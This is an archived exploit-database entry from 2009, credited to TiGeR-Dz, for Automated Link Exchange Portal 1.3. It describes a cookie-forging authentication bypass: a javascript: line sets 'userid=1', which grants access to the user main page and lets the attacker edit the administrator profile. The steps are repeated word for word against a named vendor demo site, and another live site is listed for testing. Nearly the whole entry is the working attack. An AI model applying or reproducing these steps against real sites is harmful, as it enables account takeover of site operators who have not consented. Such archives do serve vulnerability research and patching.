EXPLOITS

Automated link exchange portal 1.3 - Multiple Vulnerabilities

Author: TiGeR-Dz
type: webapps
platform: php
port: 
date_added: 2009-06-07  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8904.txt  

-------------------------------------------------------------------------
 Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:www.h4ckx.com
 Script: Automated Link Exchange Portal Version 1.3
 Download:http://www.cmsnx.com/product.demo.php?id=11
 alf mabroke bfowze al montakhabe alwatany :D
 ---------------------------------------------------------------
 Exploit
 -------
 Note:Follow these steps

 after enter the cookie (javascript:document.cookie="userid=1;path=/";) and go
 to login http://www.site.com/[path]/user.mainpage.php and change profile admin at
  http://www.site.com/[path]/user.edit.account.php

 exploit= cookie handling + Bypass login + change profile :)
 --------------------------------------------------------------
 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

 -------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.site.com/[path]/user.mainpage.php

 ----------------------------------------------------------------

 change profile Admin :
 ----------------------------

 http://www.site.com/[path]/user.edit.account.php

----------------------------------------------------------
 Dem0
 ----
 http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php

 ----------------------------------------------------------------

 change profile Admin :
 ----------------------------

 http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------------------------------

# milw0rm.com [2009-06-08]